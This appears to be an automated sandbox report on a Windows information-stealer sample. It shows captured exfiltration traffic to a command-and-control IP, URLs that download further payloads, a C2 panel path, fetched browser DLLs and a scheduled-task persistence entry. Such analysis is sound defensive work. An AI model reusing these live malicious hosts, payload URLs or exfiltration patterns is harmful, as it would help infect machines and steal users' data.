Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 38 33 38 42 38 31 41 43 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 2d 2d 0d 0a Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="hwid"7E838B81AC3A4043728354------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="build"Nice------KFIJJEGHDAEBGCAKJKFH--
Source: file.exe, 00000000.00000002.1433619231.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe.phpefoxrefox
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exeOpera
Source: explorti.exe, 00000013.00000002.3725431157.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 00000013.00000002.3725431157.0000000001460000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3725431157.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 00000013.00000002.3725431157.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php#ZC
Source: explorti.exe, 00000013.00000002.3725431157.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php3
Source: explorti.exe, 00000013.00000002.3725431157.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php4ZL
Source: explorti.exe, 00000013.00000002.3725431157.00000000014B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php8#
Source: explorti.exe, 00000013.00000002.3725431157.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php9
Source: explorti.exe, 00000013.00000002.3725431157.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpO
Source: explorti.exe, 00000013.00000002.3725431157.00000000014A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpS?w
Source: explorti.exe, 00000013.00000002.3725431157.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpVZ.
Source: explorti.exe, 00000013.00000002.3725431157.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php~
Source: file.exe, 00000000.00000002.1436568097.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll;
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dllw
Source: file.exe, 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll7
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dllc
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll
Source: file.exe, 00000000.00000002.1436568097.0000000001B77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dllV
Source: file.exe, 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.php
Source: file.exe, 00000000.00000002.1436568097.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30k
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: file.exe String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: file.exe String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.15.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1472235456.000000006CE1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1456687731.000000001D4FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1471418579.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1436568097.0000000001C87000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000002.1436568097.0000000001C87000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1436568097.0000000001C87000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1436568097.0000000001C87000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://support.mozilla.org
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: file.exe, 00000000.00000002.1436568097.0000000001C87000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1299731237.0000000001BC5000.00000004.00000020.00020000.00000000.sdmp, BFBAAFHD.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1436568097.0000000001C87000.00000004.00000020.00020000.00000000.sdmp, GHDBKFHIJKJKECAAAECA.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000002.1433619231.00000000009C6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: file.exe, 00000000.00000003.1380772328.000000002F740000.00000004.00000020.00020000.00000000.sdmp, JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1433619231.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1380772328.000000002F740000.00000004.00000020.00020000.00000000.sdmp, JEHDHIEGIIIDHIDHDHJJKJKJJD.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1433619231.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name:
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name: .idata
Source: JDGCFBAFBF.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.17.dr Static PE information: section name:
Source: explorti.exe.17.dr Static PE information: section name: .idata
Source: explorti.exe.17.dr Static PE information: section name:
PE file has nameless sections
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CE0B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE0B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CE0B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CE0B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CDAF280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDA35A0 0_2_6CDA35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDCD4D0 0_2_6CDCD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDB64C0 0_2_6CDB64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE6CF0 0_2_6CDE6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDAD4E0 0_2_6CDAD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE034A0 0_2_6CE034A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE0C4A0 0_2_6CE0C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDB6C80 0_2_6CDB6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDB5440 0_2_6CDB5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE1545C 0_2_6CE1545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE1542B 0_2_6CE1542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE5C10 0_2_6CDE5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDF2C10 0_2_6CDF2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE1AC00 0_2_6CE1AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE0DD0 0_2_6CDE0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE085F0 0_2_6CE085F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDCED10 0_2_6CDCED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDD0512 0_2_6CDD0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDBFD00 0_2_6CDBFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE176E3 0_2_6CE176E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDABEF0 0_2_6CDABEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDBFEF0 0_2_6CDBFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE04EA0 0_2_6CE04EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDC5E90 0_2_6CDC5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE0E680 0_2_6CE0E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE16E63 0_2_6CE16E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDC9E50 0_2_6CDC9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE3E50 0_2_6CDE3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDF2E4E 0_2_6CDF2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDC4640 0_2_6CDC4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDAC670 0_2_6CDAC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE7E10 0_2_6CDE7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE09E30 0_2_6CE09E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDF5600 0_2_6CDF5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDD6FF0 0_2_6CDD6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDADFE0 0_2_6CDADFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDF77A0 0_2_6CDF77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE7710 0_2_6CDE7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDB9F00 0_2_6CDB9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE150C7 0_2_6CE150C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDCC0E0 0_2_6CDCC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE58E0 0_2_6CDE58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDD60A0 0_2_6CDD60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDC8850 0_2_6CDC8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDCD850 0_2_6CDCD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDEF070 0_2_6CDEF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDB7810 0_2_6CDB7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDEB820 0_2_6CDEB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDF4820 0_2_6CDF4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE5190 0_2_6CDE5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDDD9B0 0_2_6CDDD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE02990 0_2_6CE02990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDAC9A0 0_2_6CDAC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE1B170 0_2_6CE1B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDCA940 0_2_6CDCA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDFB970 0_2_6CDFB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDBD960 0_2_6CDBD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE8AC0 0_2_6CDE8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDC1AF0 0_2_6CDC1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDEE2F0 0_2_6CDEE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE12AB0 0_2_6CE12AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDBCAB0 0_2_6CDBCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE1BA90 0_2_6CE1BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDA22A0 0_2_6CDA22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDD4AA0 0_2_6CDD4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDE9A60 0_2_6CDE9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE153C8 0_2_6CE153C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDAF380 0_2_6CDAF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDA5340 0_2_6CDA5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDBC370 0_2_6CDBC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDED320 0_2_6CDED320
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_009E4CD0 19_2_009E4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A23048 19_2_00A23048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A17D63 19_2_00A17D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A26EE9 19_2_00A26EE9
